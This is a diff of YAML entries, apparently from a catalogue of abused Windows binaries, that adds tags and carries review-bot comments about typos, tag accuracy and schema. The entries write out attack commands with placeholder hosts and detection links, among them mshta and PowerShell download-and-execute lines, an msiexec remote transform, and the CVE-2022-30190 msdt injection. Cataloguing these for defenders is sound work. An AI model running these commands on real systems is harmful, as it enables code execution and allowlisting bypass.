OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting Usecase: Execute code bypass Application allowlisting
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
Full_Path: Full_Path:
- Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument. Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -32,13 +34,17 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: WSH
- Command: mshta.exe https://example.com/payload - Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe


@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /z "C:\folder\evil.dll" - Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLUnregisterServer to un-register the target DLL. Description: Calls DLLUnregisterServer to un-register the target DLL.
Usecase: Execute dll files Usecase: Execute dll files
@ -32,6 +34,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
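Review bot: While this entry is being touched, the context lines in this hunk carry typos worth fixing in the same pass: `Treansorm file` in the Usecase should read `Transform file`, and `which can contains malicious code` should read `which can contain malicious code`. Also note that the `Execute: DLL` block here belongs to the `msiexec /z "C:\folder\evil.dll"` entry; the TRANSFORMS entry that follows fetches an .MSI and .MST from URLs, so its tags (outside this hunk) should describe that rather than inherit `Execute: DLL`.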
@ -42,8 +46,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
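Review bot: Removing the empty `Code_Sample:` / `- Code:` pair is the right call, since an empty `Code:` key parses as a null value rather than an absent field, but the same removal is repeated across many files in this commit, so please confirm the YAML schema marks `Code_Sample` as optional and that the site template tolerates its absence before merging.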

View File

@ -11,11 +11,11 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1546.007 MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.008 MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: | - Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
@ -20,6 +22,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.008 MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp - Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures Usecase: Execute dll file using technique that can evade defensive counter measures
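Review bot: The Description of the `odbcconf -f file.rsp` entry still points readers to the Code Sample section ("See the Code Sample section for an example .RSP file"), while this commit strips `Code_Sample:` blocks from a number of other files. The odbcconf hunks shown here do not remove it, but since the .RSP example is what makes this entry understandable, please verify that this file's `Code_Sample` survives the clean-up, and if it does not, either restore it or drop the cross-reference.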

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection: Detection:

View File

@ -18,6 +18,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant. Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files Usecase: Execution of CPL files
@ -27,8 +29,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
Resources: Resources:

View File

@ -12,12 +12,14 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Presentationhost.exe https://example.com/payload - Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe
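Review bot: Same concern as the mshta Description change: "place it in INetCache" replaces the concrete `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE` path that a responder would search for, and the `Download: INetCache` tag does not carry it. Suggest keeping the path in the Description alongside the new tag.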

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
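Review bot: The tag key `Type` introduced here (`- Type: Compression`) follows a different naming style from the keys used elsewhere in this commit (`Execute`, `Download`, `Input`), which name a capability or an input kind rather than a generic "type". Since the schema accepts any capitalised key, nothing stops the vocabulary from forking over time; suggest settling on one convention now and documenting the accepted keys and values in the template or contributor docs.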
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe - Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection: Detection:

View File

@ -11,10 +11,10 @@ Commands:
Privileges: User, Administrator in Windows 8 Privileges: User, Administrator in Windows 8
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\rasautou.exe - Path: C:\Windows\System32\rasautou.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
- IOC: rasautou.exe command line containing -d and -p - IOC: rasautou.exe command line containing -d and -p

View File

@ -11,6 +11,9 @@ Commands:
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
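Review bot: The value in `- Input: Custom Format` is ambiguous next to `- Execute: DLL`: the command on the following line takes a plain `.dll` argument, so it is not clear what format is being called custom. The Descriptions in this file say the DLL must expose `UnRegisterClass` / `RegisterClass` for regasm to call, so if that requirement is what the tag denotes, a more specific value (for example one naming the .NET assembly registration entry point) would help readers; otherwise consider dropping the tag.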
@ -18,13 +21,14 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
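Review bot: Same point as on regasm: `- Input: Custom Format` is opaque next to `- Execute: DLL` for a command that takes a bare `.dll`. Please either spell out what the custom format is (the Description names the `RegisterClass` function the DLL must provide) or leave the tag off.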
@ -18,11 +21,12 @@ Commands:
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share. Usecase: Execute DLL from SMB share.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet Usecase: Execute code from Internet
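Review bot: The `Execute: DLL` block here belongs to the `rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint` entry, which is right, but the entry that follows (`javascript:"\..\mshtml,RunHTMLApplication"`) runs script through mshtml and then PowerShell, so its own tags (outside this hunk) should reflect script execution rather than a DLL load if they were filled in by copy-paste. Worth a quick check.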
@ -53,18 +57,20 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe -sta {CLSID} - Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
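Review bot: `- Execute: DLL` undersells the `rundll32.exe -sta {CLSID}` entry: its Description says it also works with a ProgID and its Usecase covers "a DLL/EXE COM server payload or ScriptletURL code", so the COM server may be an EXE or a scriptlet rather than a DLL. Suggest a second tag for the COM/scriptlet case, or a value that says COM server rather than DLL, so the tag does not filter this entry out of a search for script-based execution.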

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf compressedfilename:ads - Command: tar -xf compressedfilename:ads
Description: Decompress a compressed file from an alternate data stream (ADS). Description: Decompress a compressed file from an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf \\host1\archive.tar - Command: tar -xf \\host1\archive.tar
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host. Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
Usecase: Copy files Usecase: Copy files
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\tar.exe - Path: C:\Windows\System32\tar.exe
- Path: C:\Windows\SysWOW64\tar.exe - Path: C:\Windows\SysWOW64\tar.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable. Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
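Review bot: `- Execute: WSH` looks wrong for vbc.exe: the Description on this hunk says it is the .NET binary that compiles Visual Basic code to an executable (MitreID T1127, trusted developer utility), and Visual Basic .NET is not a Windows Script Host language. Suggest a tag that names compilation rather than WSH, and the same applies to the second vbc entry below.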
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
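Review bot: As for the first vbc entry, `- Execute: WSH` does not describe a .NET compiler; please use the same compilation-oriented tag on both entries so they stay consistent.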
@ -28,6 +32,4 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement: Acknowledgement:
- Person: Lior Adar - Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux) - Person: Hai Vaknin(Lux)
Handle:
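Review bot: Dropping the empty `Handle:` keys under Acknowledgement is fine (an empty key is a null, not an absent field), but please confirm the schema treats `Handle` as optional rather than required-but-nullable, otherwise validation will start failing here. Minor drive-by: `Hai Vaknin(Lux)` is missing a space before the parenthesis.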

View File

@ -39,11 +39,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\System32\wbem\wmic.exe
- Path: C:\Windows\SysWOW64\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe
Code_Sample:
- Code:
Detection: Detection:
